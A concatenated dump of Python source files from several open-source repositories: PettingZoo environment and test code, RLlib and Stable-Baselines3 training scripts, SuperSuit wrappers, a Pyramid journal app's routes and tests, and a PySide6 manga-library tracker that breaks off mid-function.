)
gold_dispenser.begin = add_gold
handoff_gold = self.space.add_collision_handler(
CollisionTypes.BANKER, CollisionTypes.GOLD
)
handoff_gold.begin = handoff_gold_handler
gold_score = self.space.add_collision_handler(
CollisionTypes.GOLD, CollisionTypes.BANK
)
gold_score.begin = gold_score_handler
def seed(self, seed=None):
self.rng, seed = seeding.np_random(seed)
def observe(self, agent):
capture = pg.surfarray.pixels3d(self.screen)
if agent in self.prospectors:
ag = self.prospectors[agent]
side_len = const.PROSPEC_OBSERV_SIDE_LEN
else:
ag = self.bankers[agent]
side_len = const.BANKER_OBSERV_SIDE_LEN
delta = side_len // 2
x, y = ag.center # Calculated property added to prospector and banker classes
sub_screen = np.array(
capture[
max(0, x - delta) : min(const.SCREEN_WIDTH, x + delta),
max(0, y - delta) : min(const.SCREEN_HEIGHT, y + delta),
:,
],
dtype=np.uint8,
)
s_x, s_y, _ = sub_screen.shape
pad_x = side_len - s_x
if x > const.SCREEN_WIDTH - delta: # Right side of the screen
sub_screen = np.pad(
sub_screen, pad_width=((0, pad_x), (0, 0), (0, 0)), mode="constant"
)
elif x < 0 + delta:
sub_screen = np.pad(
sub_screen, pad_width=((pad_x, 0), (0, 0), (0, 0)), mode="constant"
)
pad_y = side_len - s_y
if y > const.SCREEN_HEIGHT - delta: # Bottom of the screen
sub_screen = np.pad(
sub_screen, pad_width=((0, 0), (0, pad_y), (0, 0)), mode="constant"
)
elif y < 0 + delta:
sub_screen = np.pad(
sub_screen, pad_width=((0, 0), (pad_y, 0), (0, 0)), mode="constant"
)
sub_screen = np.rot90(sub_screen, k=3)
sub_screen = np.fliplr(sub_screen).astype(np.uint8)
self.last_observation[agent] = sub_screen
return sub_screen
def observation_space(self, agent):
return self.observation_spaces[agent]
def action_space(self, agent):
return self.action_spaces[agent]
def state(self):
"""
Returns an observation of the global environment
"""
state = pg.surfarray.pixels3d(self.screen).copy()
state = np.rot90(state, k=3)
state = np.fliplr(state)
return state
def step(self, action):
if self.dones[self.agent_selection]:
return self._was_done_step(action)
agent_id = self.agent_selection
all_agents_updated = self._agent_selector.is_last()
self.rewards = {agent: 0 for agent in self.agents}
if agent_id in self.prospectors:
agent = self.prospectors[agent_id]
else:
agent = self.bankers[agent_id]
self.background.update(agent.rect)
nugget = agent.body.nugget
if nugget is not None:
self.background.update(nugget.rect)
agent.update(action)
# Only take next step in game if all agents have received an action
if all_agents_updated:
for _ in range(const.STEPS_PER_FRAME):
self.space.step(const.SPACE_STEP_DELTA)
for pr in self.prospectors.values():
pr.synchronize_center()
pr.update_gold()
self.background.update(pr.rect)
nugget = pr.body.nugget
if nugget is not None:
self.background.update(nugget.rect)
for b in self.bankers.values():
b.synchronize_center()
b.update_gold()
self.background.update(b.rect)
nugget = b.body.nugget
if nugget is not None:
self.background.update(nugget.rect)
self.draw()
self.frame += 1
# If we reached max frames, we're done
if self.frame == self.max_cycles:
self.dones = dict(zip(self.agents, [True for _ in self.agents]))
if self.rendering:
pg.event.pump()
self.agent_selection = self._agent_selector.next()
self._cumulative_rewards[agent_id] = 0
self._accumulate_rewards()
def reset(self, seed=None, options=None):
if seed is not None:
self.seed(seed=seed)
self.screen = pg.Surface(const.SCREEN_SIZE)
self.done = False
self.background.generate_debris(self.rng)
self.water.generate_debris(self.rng)
for p in self.prospectors.values():
p.reset(utils.rand_pos("prospector", self.rng))
for b in self.bankers.values():
b.reset(utils.rand_pos("banker", self.rng))
for g in self.gold:
self.space.remove(g.shape, g.body)
self.all_sprites.remove(g)
self.gold = []
self.agents = self.possible_agents[:]
self.rewards = dict(zip(self.agents, [0 for _ in self.agents]))
self._cumulative_rewards = dict(zip(self.agents, [0 for _ in self.agents]))
self.dones = dict(zip(self.agents, [False for _ in self.agents]))
self.infos = dict(zip(self.agents, [{} for _ in self.agents]))
self.rendering = False
self.frame = 0
self.background.dirty_rects.clear()
self._agent_selector.reinit(self.agents)
self.agent_selection = self._agent_selector.next()
self.full_draw()
def render(self, mode="human"):
if mode == "human":
if not self.rendering:
self.rendering = True
pg.display.init()
self.screen = pg.display.set_mode(const.SCREEN_SIZE)
self.background.convert_img()
self.water.convert_img()
for f in self.fences:
f.convert_img()
for s in self.all_sprites.sprites():
s.convert_img()
self.full_draw()
pg.display.flip()
elif mode == "rgb_array": # no display, return whole screen as array
observation = np.array(pg.surfarray.pixels3d(self.screen))
transposed = np.transpose(observation, axes=(1, 0, 2))
return transposed
def full_draw(self):
"""Called to draw everything when first rendering"""
self.background.full_draw(self.screen)
for f in self.fences:
f.full_draw(self.screen)
self.water.full_draw(self.screen)
self.all_sprites.draw(self.screen)
def draw(self):
"""Called after each frame, all agents updated"""
self.background.draw(self.screen)
for f in self.fences:
f.full_draw(self.screen)
self.water.full_draw(self.screen)
self.all_sprites.draw(self.screen)
def close(self):
if not self.closed:
self.closed = True
if self.rendering:
pg.event.pump()
pg.display.quit()
pg.quit()
# Art by <NAME>
```
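A minimal interaction sketch for the environment above, assuming the module is importable (the `prospector` import path is hypothetical) and PettingZoo's dones-era AEC API, which matches the `self.dones` usage in `raw_env`; actions are sampled from the Box spaces declared in `__init__`:

```python
from prospector import env  # hypothetical import path for the module above

aec_env = env(max_cycles=450)
aec_env.reset(seed=42)
for agent in aec_env.agent_iter(max_iter=200):
    obs, reward, done, info = aec_env.last()
    # done agents must step with None under this API version
    action = None if done else aec_env.action_space(agent).sample()
    aec_env.step(action)
aec_env.close()
```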
#### File: PettingZoo/test/all_parameter_combs.py
```python
import pytest
from pettingzoo.test.api_test import api_test
from pettingzoo.test.max_cycles_test import max_cycles_test
from pettingzoo.test.parallel_test import parallel_api_test
from pettingzoo.test.render_test import render_test
from pettingzoo.test.seed_test import check_environment_deterministic, seed_test
from pettingzoo.test.state_test import state_test
from pettingzoo.utils import aec_to_parallel, parallel_to_aec
from .all_modules import * # noqa: F403
from .all_modules import all_environments
parameterized_envs = [
["atari/boxing_v2", boxing_v2, dict(obs_type="grayscale_image")],
["atari/boxing_v2", boxing_v2, dict(obs_type="ram")],
["atari/boxing_v2", boxing_v2, dict(full_action_space=False)],
["atari/combat_plane_v2", combat_plane_v2, dict(game_version="jet")],
["atari/combat_plane_v2", combat_plane_v2, dict(guided_missile=True)],
["atari/combat_tank_v2", combat_tank_v2, dict(has_maze=True)],
["atari/combat_tank_v2", combat_tank_v2, dict(is_invisible=True)],
["atari/combat_tank_v2", combat_tank_v2, dict(billiard_hit=True)],
["atari/maze_craze_v3", maze_craze_v3, dict(game_version="race")],
["atari/maze_craze_v3", maze_craze_v3, dict(game_version="capture")],
["atari/maze_craze_v3", maze_craze_v3, dict(visibilty_level=1)],
["atari/maze_craze_v3", maze_craze_v3, dict(visibilty_level=3)],
[
"atari/space_invaders_v2",
space_invaders_v2,
dict(
alternating_control=True,
moving_shields=True,
zigzaging_bombs=True,
fast_bomb=True,
invisible_invaders=True,
),
],
["classic/leduc_holdem_v4", leduc_holdem_v4, dict(num_players=2)],
["classic/leduc_holdem_v4", leduc_holdem_v4, dict(num_players=3)],
["classic/leduc_holdem_v4", leduc_holdem_v4, dict(num_players=4)],
["classic/texas_holdem_v4", texas_holdem_v4, dict(num_players=2)],
["classic/texas_holdem_v4", texas_holdem_v4, dict(num_players=3)],
["classic/texas_holdem_v4", texas_holdem_v4, dict(num_players=4)],
["classic/texas_holdem_no_limit_v6", texas_holdem_no_limit_v6, dict(num_players=2)],
["classic/texas_holdem_no_limit_v6", texas_holdem_no_limit_v6, dict(num_players=3)],
["classic/texas_holdem_no_limit_v6", texas_holdem_no_limit_v6, dict(num_players=4)],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(spawn_rate=50),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(num_knights=4, num_archers=5),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(killable_knights=True, killable_archers=True),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(killable_knights=False, killable_archers=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(line_death=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(vector_state=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(vector_state=False, pad_observation=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(max_cycles=100),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(use_typemasks=False),
],
[
"butterfly/knights_archers_zombies_v10",
knights_archers_zombies_v10,
dict(max_zombies=2, max_arrows=60),
],
["butterfly/pistonball_v6", pistonball_v6, dict(continuous=True)],
["butterfly/pistonball_v6", pistonball_v6, dict(n_pistons=30)],
["butterfly/pistonball_v6", pistonball_v6, dict(continuous=False)],
[
"butterfly/pistonball_v6",
pistonball_v6,
dict(random_drop=True, random_rotate=True),
],
[
"butterfly/pistonball_v6",
pistonball_v6,
dict(random_drop=False, random_rotate=False),
],
[
"butterfly/prospector_v4",
prospector_v4,
dict(
ind_reward=0.8,
group_reward=0.1,
other_group_reward=0.1,
prospec_find_gold_reward=1,
prospec_handoff_gold_reward=1,
banker_receive_gold_reward=1,
banker_deposit_gold_reward=1,
max_cycles=900,
),
],
["classic/go_v5", go_v5, dict(board_size=13, komi=2.5)],
["classic/go_v5", go_v5, dict(board_size=9, komi=0.0)],
["classic/hanabi_v4", hanabi_v4, dict(colors=3)],
["classic/hanabi_v4", hanabi_v4, dict(ranks=3)],
["classic/hanabi_v4", hanabi_v4, dict(players=4)],
["classic/hanabi_v4", hanabi_v4, dict(hand_size=5)],
["classic/hanabi_v4", hanabi_v4, dict(max_information_tokens=3)],
["classic/hanabi_v4", hanabi_v4, dict(max_life_tokens=2)],
[
"classic/hanabi_v4",
hanabi_v4,
dict(
colors=5,
ranks=3,
players=4,
hand_size=5,
max_information_tokens=3,
max_life_tokens=2,
),
],
["classic/hanabi_v4", hanabi_v4, dict(observation_type=0)],
["classic/hanabi_v4", hanabi_v4, dict(observation_type=1)],
["classic/hanabi_v4", hanabi_v4, dict(random_start_player=False)],
["classic/hanabi_v4", hanabi_v4, dict(random_start_player=True)],
["magent/tiger_deer_v4", tiger_deer_v4, dict(minimap_mode=True)],
["magent/battle_v4", battle_v4, dict(minimap_mode=False)],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=False, extra_features=False),
],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=False, extra_features=True),
],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=True, extra_features=False),
],
[
"magent/battlefield_v5",
battlefield_v5,
dict(minimap_mode=True, extra_features=True),
],
["magent/adversarial_pursuit_v4", adversarial_pursuit_v4, dict(map_size=15)],
["magent/battle_v4", battle_v4, dict(map_size=15)],
["magent/battlefield_v5", battlefield_v5, dict(map_size=46)],
["magent/combined_arms_v6", combined_arms_v6, dict(map_size=16)],
["magent/tiger_deer_v4", tiger_deer_v4, dict(map_size=15)],
["mpe/simple_adversary_v2", simple_adversary_v2, dict(N=4)],
["mpe/simple_reference_v2", simple_reference_v2, dict(local_ratio=0.2)],
["mpe/simple_spread_v2", simple_spread_v2, dict(N=5)],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=5, num_adversaries=10, num_obstacles=4),
],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=1, num_adversaries=1, num_obstacles=1),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(num_good=5, num_adversaries=10, num_obstacles=4, num_food=3),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(num_good=1, num_adversaries=1, num_obstacles=1, num_food=1),
],
[
"mpe/simple_adversary_v2",
simple_adversary_v2,
dict(N=4, continuous_actions=True),
],
[
"mpe/simple_reference_v2",
simple_reference_v2,
dict(local_ratio=0.2, continuous_actions=True),
],
["mpe/simple_spread_v2", simple_spread_v2, dict(N=5, continuous_actions=True)],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=5, num_adversaries=10, num_obstacles=4, continuous_actions=True),
],
[
"mpe/simple_tag_v2",
simple_tag_v2,
dict(num_good=1, num_adversaries=1, num_obstacles=1, continuous_actions=True),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(
num_good=5,
num_adversaries=10,
num_obstacles=4,
num_food=3,
continuous_actions=True,
),
],
[
"mpe/simple_world_comm_v2",
simple_world_comm_v2,
dict(
num_good=1,
num_adversaries=1,
num_obstacles=1,
num_food=1,
continuous_actions=True,
),
],
["sisl/multiwalker_v9", multiwalker_v9, dict(n_walkers=10)],
["sisl/multiwalker_v9", multiwalker_v9, dict(shared_reward=False)],
["sisl/multiwalker_v9", multiwalker_v9, dict(terminate_on_fall=False)],
[
"sisl/multiwalker_v8",
multiwalker_v9,
dict(terminate_on_fall=False, remove_on_fall=False),
],
["sisl/pursuit_v4", pursuit_v4, dict(x_size=8, y_size=19)],
["sisl/pursuit_v4", pursuit_v4, dict(shared_reward=True)],
["sisl/pursuit_v4", pursuit_v4, dict(n_evaders=5, n_pursuers=16)],
["sisl/pursuit_v4", pursuit_v4, dict(obs_range=15)],
["sisl/pursuit_v4", pursuit_v4, dict(n_catch=3)],
["sisl/pursuit_v4", pursuit_v4, dict(freeze_evaders=True)],
["sisl/waterworld_v3", waterworld_v3, dict(n_pursuers=3, n_evaders=6)],
["sisl/waterworld_v3", waterworld_v3, dict(n_coop=1)],
["sisl/waterworld_v3", waterworld_v3, dict(n_coop=1)],
["sisl/waterworld_v3", waterworld_v3, dict(n_poison=4)],
["sisl/waterworld_v3", waterworld_v3, dict(n_sensors=4)],
["sisl/waterworld_v3", waterworld_v3, dict(local_ratio=0.5)],
["sisl/waterworld_v3", waterworld_v3, dict(speed_features=False)],
]
@pytest.mark.parametrize(["name", "env_module", "kwargs"], parameterized_envs)
def test_module(name, env_module, kwargs):
_env = env_module.env(**kwargs)
api_test(_env)
# some atari environments fail this test
if "atari/" not in name:
seed_test(lambda: env_module.env(**kwargs), 50)
render_test(lambda: env_module.env(**kwargs))
if hasattr(env_module, "parallel_env"):
par_env = env_module.parallel_env(**kwargs)
try:
_env.state()
state_test(_env, par_env)
except NotImplementedError:
# no issue if state is simply not implemented
pass
```
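To exercise a single family of rows from `parameterized_envs` without running the whole matrix, pytest's keyword filter can be invoked programmatically (a sketch; the `-k` expression matches against the generated test ids):

```python
import pytest

# Run only the boxing_v2 parameterizations; equivalent to
# `pytest -k boxing test/all_parameter_combs.py` on the command line.
pytest.main(["test/all_parameter_combs.py", "-k", "boxing"])
```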
#### File: PettingZoo/tutorials/rllib_pistonball.py
```python
import supersuit as ss
import torch
from ray import shutdown, tune
from ray.rllib.env.wrappers.pettingzoo_env import ParallelPettingZooEnv
from ray.rllib.models import ModelCatalog
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.tune.registry import register_env
from torch import nn
from pettingzoo.butterfly import pistonball_v6
class CNNModelV2(TorchModelV2, nn.Module):
def __init__(self, obs_space, act_space, num_outputs, *args, **kwargs):
TorchModelV2.__init__(self, obs_space, act_space, num_outputs, *args, **kwargs)
nn.Module.__init__(self)
self.model = nn.Sequential(
nn.Conv2d(3, 32, [8, 8], stride=(4, 4)),
nn.ReLU(),
nn.Conv2d(32, 64, [4, 4], stride=(2, 2)),
nn.ReLU(),
nn.Conv2d(64, 64, [3, 3], stride=(1, 1)),
nn.ReLU(),
nn.Flatten(),
            nn.Linear(3136, 512),
nn.ReLU(),
)
self.policy_fn = nn.Linear(512, num_outputs)
self.value_fn = nn.Linear(512, 1)
def forward(self, input_dict, state, seq_lens):
model_out = self.model(input_dict["obs"].permute(0, 3, 1, 2))
self._value_out = self.value_fn(model_out)
return self.policy_fn(model_out), state
def value_function(self):
return self._value_out.flatten()
def env_creator(args):
env = pistonball_v6.parallel_env(
n_pistons=20,
time_penalty=-0.1,
continuous=True,
random_drop=True,
random_rotate=True,
ball_mass=0.75,
ball_friction=0.3,
ball_elasticity=1.5,
max_cycles=125,
)
env = ss.color_reduction_v0(env, mode="B")
env = ss.dtype_v0(env, "float32")
env = ss.resize_v0(env, x_size=84, y_size=84)
env = ss.frame_stack_v1(env, 3)
env = ss.normalize_obs_v0(env, env_min=0, env_max=1)
return env
if __name__ == "__main__":
shutdown()
env_name = "pistonball_v6"
register_env(env_name, lambda config: ParallelPettingZooEnv(env_creator(config)))
test_env = ParallelPettingZooEnv(env_creator({}))
obs_space = test_env.observation_space
act_space = test_env.action_space
ModelCatalog.register_custom_model("CNNModelV2", CNNModelV2)
def gen_policy(i):
config = {
"model": {
"custom_model": "CNNModelV2",
},
"gamma": 0.99,
}
return (None, obs_space, act_space, config)
policies = {"policy_0": gen_policy(0)}
policy_ids = list(policies.keys())
tune.run(
"PPO",
name="PPO",
stop={"timesteps_total": 5000000},
checkpoint_freq=10,
local_dir="~/ray_results/" + env_name,
config={
# Environment specific
"env": env_name,
# General
"log_level": "ERROR",
"framework": "torch",
"num_gpus": 1,
"num_workers": 4,
"num_envs_per_worker": 1,
"compress_observations": False,
"batch_mode": "truncate_episodes",
# 'use_critic': True,
"use_gae": True,
"lambda": 0.9,
"gamma": 0.99,
# "kl_coeff": 0.001,
# "kl_target": 1000.,
"clip_param": 0.4,
"grad_clip": None,
"entropy_coeff": 0.1,
"vf_loss_coeff": 0.25,
"sgd_minibatch_size": 64,
"num_sgd_iter": 10, # epoc
"rollout_fragment_length": 512,
"train_batch_size": 512,
"lr": 2e-05,
"clip_actions": True,
# Method specific
"multiagent": {
"policies": policies,
"policy_mapping_fn": (lambda agent_id: policy_ids[0]),
},
},
)
``` |
{
"source": "jjshoots/rl-baselines3-zoo",
"score": 2
} |
#### File: jjshoots/rl-baselines3-zoo/eval_hyperparameters.py
```python
import sys
import json
from stable_baselines3 import PPO
from pettingzoo.butterfly import pistonball_v6
import supersuit as ss
from stable_baselines3.common.vec_env import VecMonitor, VecTransposeImage, VecNormalize
from stable_baselines3.common.evaluation import evaluate_policy
from stable_baselines3.common.callbacks import EvalCallback
from stable_baselines3.common.preprocessing import (
is_image_space,
is_image_space_channels_first,
)
num = sys.argv[1]
n_evaluations = 20
n_agents = 20
n_envs = 4
n_timesteps = 2000000
with open("./hyperparameter_jsons/" + "hyperparameters_" + num + ".json") as f:
params = json.load(f)
print(params)
def image_transpose(env):
if is_image_space(env.observation_space) and not is_image_space_channels_first(
env.observation_space
):
env = VecTransposeImage(env)
return env
env = pistonball_v6.parallel_env()
env = ss.color_reduction_v0(env, mode="B")
env = ss.resize_v0(env, x_size=84, y_size=84)
env = ss.frame_stack_v1(env, 3)
env = ss.pettingzoo_env_to_vec_env_v1(env)
env = ss.concat_vec_envs_v1(env, n_envs, num_cpus=1, base_class="stable_baselines3")
env = VecMonitor(env)
env = image_transpose(env)
eval_env = pistonball_v6.parallel_env()
eval_env = ss.color_reduction_v0(eval_env, mode="B")
eval_env = ss.resize_v0(eval_env, x_size=84, y_size=84)
eval_env = ss.frame_stack_v1(eval_env, 3)
eval_env = ss.pettingzoo_env_to_vec_env_v1(eval_env)
eval_env = ss.concat_vec_envs_v1(
eval_env, 1, num_cpus=1, base_class="stable_baselines3"
)
eval_env = VecMonitor(eval_env)
eval_env = image_transpose(eval_env)
eval_freq = int(n_timesteps / n_evaluations)
eval_freq = max(eval_freq // (n_envs * n_agents), 1)
all_mean_rewards = []
for i in range(10):
try:
model = PPO("CnnPolicy", env, verbose=1, **params)
eval_callback = EvalCallback(
eval_env,
best_model_save_path="./eval_logs/" + num + "/" + str(i) + "/",
log_path="./eval_logs/" + num + "/" + str(i) + "/",
eval_freq=eval_freq,
deterministic=True,
render=False,
)
model.learn(total_timesteps=n_timesteps, callback=eval_callback)
model = PPO.load("./eval_logs/" + num + "/" + str(i) + "/" + "best_model")
mean_reward, std_reward = evaluate_policy(
model, eval_env, deterministic=True, n_eval_episodes=25
)
print(mean_reward)
print(std_reward)
all_mean_rewards.append(mean_reward)
if mean_reward > 90:
model.save(
"./mature_policies/"
+ str(num)
+ "/"
+ str(i)
+ "_"
+ str(mean_reward).split(".")[0]
+ ".zip"
)
    except Exception as exc:
        print(f"Error occurred during evaluation: {exc}")
if len(all_mean_rewards) > 0:
print(sum(all_mean_rewards) / len(all_mean_rewards))
else:
print("No mature policies found")
``` |
{
"source": "jjshoots/SuperSuit",
"score": 2
} |
#### File: supersuit/generic_wrappers/max_observation.py
```python
from .utils.base_modifier import BaseModifier
from .utils.shared_wrapper_util import shared_wrapper
from supersuit.utils.accumulator import Accumulator
import numpy as np
def max_observation_v0(env, memory):
    int(memory)  # memory must be an int
class MaxObsModifier(BaseModifier):
def reset(self, seed=None, return_info=False, options=None):
self.accumulator = Accumulator(self.observation_space, memory, np.maximum)
def modify_obs(self, obs):
self.accumulator.add(obs)
return super().modify_obs(self.accumulator.get())
return shared_wrapper(env, MaxObsModifier)
```
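A minimal usage sketch for the wrapper above, as exposed through the supersuit package; the `Accumulator` keeps an elementwise running `np.maximum` over the last `memory` observations, the usual Atari-style flicker fix:

```python
import supersuit as ss
from pettingzoo.butterfly import pistonball_v6

env = pistonball_v6.env()
# each observation becomes the pixelwise max of the two most recent frames
env = ss.max_observation_v0(env, 2)
```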
#### File: supersuit/multiagent_wrappers/black_death.py
```python
from pettingzoo.utils.wrappers import BaseParallelWraper
import numpy as np
import gym
from supersuit.utils.wrapper_chooser import WrapperChooser
class black_death_par(BaseParallelWraper):
def __init__(self, env):
super().__init__(env)
def _check_valid_for_black_death(self):
for agent in self.agents:
space = self.observation_space(agent)
assert isinstance(
space, gym.spaces.Box
), f"observation sapces for black death must be Box spaces, is {space}"
def reset(self, seed=None, return_info=False, options=None):
if not return_info:
obss = self.env.reset(seed=seed, options=options)
else:
obss, infos = self.env.reset(
seed=seed, return_info=return_info, options=options
)
self.agents = self.env.agents[:]
self._check_valid_for_black_death()
black_obs = {
agent: np.zeros_like(self.observation_space(agent).low)
for agent in self.agents
if agent not in obss
}
if not return_info:
return {**obss, **black_obs}
else:
black_infos = {agent: {} for agent in self.agents if agent not in obss}
return {**obss, **black_obs}, {**black_infos, **infos}
def step(self, actions):
active_actions = {agent: actions[agent] for agent in self.env.agents}
obss, rews, dones, infos = self.env.step(active_actions)
black_obs = {
agent: np.zeros_like(self.observation_space(agent).low)
for agent in self.agents
if agent not in obss
}
black_rews = {agent: 0.0 for agent in self.agents if agent not in obss}
black_infos = {agent: {} for agent in self.agents if agent not in obss}
env_is_done = all(dones.values())
total_obs = {**black_obs, **obss}
total_rews = {**black_rews, **rews}
total_infos = {**black_infos, **infos}
total_dones = {agent: env_is_done for agent in self.agents}
if env_is_done:
self.agents.clear()
return total_obs, total_rews, total_dones, total_infos
black_death_v3 = WrapperChooser(parallel_wrapper=black_death_par)
``` |
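A usage sketch for `black_death_v3`: after wrapping, agents that die mid-episode keep emitting zeroed Box observations and 0.0 rewards instead of disappearing from the per-step dicts, so the agent set stays fixed for downstream vectorization. The environment choice here is illustrative:

```python
import supersuit as ss
from pettingzoo.butterfly import knights_archers_zombies_v10

env = knights_archers_zombies_v10.parallel_env()
env = ss.black_death_v3(env)  # only the parallel wrapper is registered above
```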
{
"source": "jjskim/pyramid-journal",
"score": 2
} |
#### File: pyramid-journal/pyramid_journal/routes.py
```python
def includeme(config):
"""Include the following routes for static files and uri paths."""
config.add_static_view('static', 'static', cache_max_age=3600)
config.add_route('home', '/')
    # config.add_route('detail', r'/journal/{id:\d+}')  # regex-constrained id
config.add_route('detail', '/journal/1')
config.add_route('new', '/journal/new-entry')
    # config.add_route('edit', r'/journal/{id:\d+}/edit-entry')
config.add_route('edit', '/journal/1/edit-entry')
```
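The commented-out patterns above hint at the intended parametrized routes; a sketch of enabling them (hypothetical, since the views currently hard-code entry 1). Pyramid's `{id:\d+}` placeholder constrains that segment to digits and exposes the match via `request.matchdict`:

```python
# inside includeme(config):
config.add_route('detail', r'/journal/{id:\d+}')
config.add_route('edit', r'/journal/{id:\d+}/edit-entry')

# and inside a view callable registered for these routes:
# entry_id = int(request.matchdict['id'])
```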
#### File: pyramid-journal/pyramid_journal/tests.py
```python
from __future__ import unicode_literals
from pyramid import testing
import pytest
@pytest.fixture
def dummy_request():
"""Fixture to return a single dummy request."""
return testing.DummyRequest()
def test_list_view_response_status_code_200(dummy_request):
"""Test that requesting list_view returns a 200 response."""
from pyramid_journal.views.default import list_view
response = list_view(dummy_request)
assert response.status_code == 200
def test_detail_view_response_status_code_200(dummy_request):
"""Test that requesting detail_view returns a 200 response."""
from pyramid_journal.views.default import detail_view
response = detail_view(dummy_request)
assert response.status_code == 200
def test_update_view_response_status_code_200(dummy_request):
"""Test that requesting update_view returns a 200 response."""
from pyramid_journal.views.default import update_view
response = update_view(dummy_request)
assert response.status_code == 200
def test_create_view_response_status_code_200(dummy_request):
"""Test that requesting create_view returns a 200 response."""
from pyramid_journal.views.default import create_view
response = create_view(dummy_request)
assert response.status_code == 200
def test_list_view_text_response_is_content_type_html(dummy_request):
"""Test that list_view returns proper content within text."""
from pyramid_journal.views.default import list_view
response = list_view(dummy_request)
assert response.content_type == "text/html"
def test_list_view_text_response_has_proper_content(dummy_request):
"""Test that list_view returns proper content within text."""
from pyramid_journal.views.default import list_view
response = list_view(dummy_request)
the_tag = '<div class="entry_summary">'
assert the_tag in response.ubody
def test_detail_view_text_response_has_proper_content(dummy_request):
"""Test that detail_view returns proper content within text."""
from pyramid_journal.views.default import detail_view
response = detail_view(dummy_request)
the_tag = '<a href="/journal/1/edit-entry">Edit</a>'
assert the_tag in response.ubody
def test_edit_view_text_response_has_proper_content(dummy_request):
"""Test that edit_view returns proper content within text."""
from pyramid_journal.views.default import update_view
response = update_view(dummy_request)
the_tag = '<button type="submit">Edit Post</button>'
assert the_tag in response.ubody
def test_create_view_text_response_has_proper_content(dummy_request):
"""Test that create_view returns proper content within text."""
from pyramid_journal.views.default import create_view
response = create_view(dummy_request)
the_tag = '<button type="submit">Create New</button>'
assert the_tag in response.ubody
``` |
{
"source": "jjsmall009/manga-volume-tracker",
"score": 2
} |
#### File: manga-volume-tracker/mangecko/app.py
```python
from PySide6.QtWidgets import QApplication
from .controllers.controller import MainWindow
from .models import database_manager
def main():
app = QApplication([])
# Initialize our database and setup our connection
database_manager.initialize()
window = MainWindow()
window.show()
app.exec()
```
#### File: mangecko/controllers/add_library_controller.py
```python
from PySide6.QtWidgets import QDialog, QFileDialog, QMessageBox, QTableWidgetItem
from PySide6.QtCore import QObject, QThread, Signal
from pathlib import Path
from ..models.manga_model import Manga
from ..models import database_manager
from ..utilities.manga_scraper import series_scraper, series_search
from ..utilities.library_scanner import LibraryScanner
from ..views.ui_add_library_dialog import Ui_AddLibraryDialog
class LibraryAdder(QObject):
counter = Signal(int)
current_series = Signal(Manga)
exists = Signal()
finished = Signal()
def __init__(self, path, valid):
super().__init__()
self.library_path = path
self.valid_series = valid
def add_library(self):
"""
A library is just a collection of series that are related to one another
(Completed, Ongoing, Favorites, Raw, etc.)
A library in the database stores info about all matching series in the folder,
even ones that don't have a MangaUpdates match.
"""
manga = []
if not database_manager.insert_library(self.library_path.name, str(self.library_path)):
self.exists.emit()
print("I have emitted failure")
return
# For each valid folder, create a Manga object and then get some precious data
for count, (series, vol_count) in enumerate(self.valid_series.items()):
current_manga = Manga(series, vol_count)
id = series_search(series)
if id != None:
current_manga.site_id = id
current_manga.has_match = True
series_scraper(id, current_manga)
manga.append(current_manga)
self.counter.emit(count + 1)
self.current_series.emit(current_manga)
database_manager.insert_manga(manga, self.library_path.name)
self.finished.emit()
class AddLibraryDialog(QDialog, Ui_AddLibraryDialog):
def __init__(self, parent=None):
super().__init__()
self.setupUi(self)
self.done_btn.setEnabled(False)
self.count = 0
self.thread = QThread(parent=self)
self.series_table.setColumnWidth(0,400)
# Create our signals and slots
self.open_btn.clicked.connect(self.open_file)
self.add_library_btn.clicked.connect(self.setup_library)
self.done_btn.clicked.connect(self.terminate)
self.cancel_btn.clicked.connect(self.terminate)
self.name = ""
def get_name(self):
return self.name
def open_file(self):
        # getExistingDirectory takes (parent, caption, dir); pass the path as dir
        fname = QFileDialog.getExistingDirectory(self, "Select library folder", "c:\\")
self.path_field.setText(fname)
self.add_library_btn.setEnabled(True)
def setup_library(self):
self.path = Path(self.path_field.text())
if not Path(self.path).exists():
QMessageBox.about(self, "Not valid path", "Not a valid path")
return
scanner = LibraryScanner(self.path)
scanner.scan_directory()
self.valid_series = scanner.valid_folders
if len(scanner.valid_folders) == 0:
QMessageBox.about(self, "No folders", "No folders founds. Not a valid library.")
return
# Thread it up
self.adder = LibraryAdder(self.path, self.valid_series)
self.adder.moveToThread(self.thread)
self.thread.started.connect(self.adder.add_library)
self.adder.counter.connect(self.update_progress)
self.adder.current_series.connect(self.update_list)
self.adder.exists.connect(self.library_exists)
self.adder.finished.connect(self.cleanup)
self.thread.start()
self.name = self.path.name
def cleanup(self):
self.done_btn.setEnabled(True)
self.adder.finished.connect(self.thread.quit)
self.adder.finished.connect(self.adder.deleteLater)
self.thread.finished.connect(self.thread.deleteLater)
def terminate(self):
if self.thread.isRunning():
self.thread.quit()
self.close()
def library_exists(self):
QMessageBox.about(self, "Library exists", "Library already exists")
def update_list(self, series):
self.series_table.insertRow(self.count)
self.series_table.setItem(self.count, 0, QTableWidgetItem(series.local_title))
self.series_table.setItem(self.count, 1, QTableWidgetItem(str(series.site_id)))
self.series_table.setItem(self.count, 2, QTableWidgetItem(str(series.my_volumes)))
self.series_table.setItem(self.count, 3, QTableWidgetItem(str(series.eng_volumes)))
self.series_table.setItem(self.count, 4, QTableWidgetItem(str(series.source_volumes)))
self.count += 1
def update_progress(self, count):
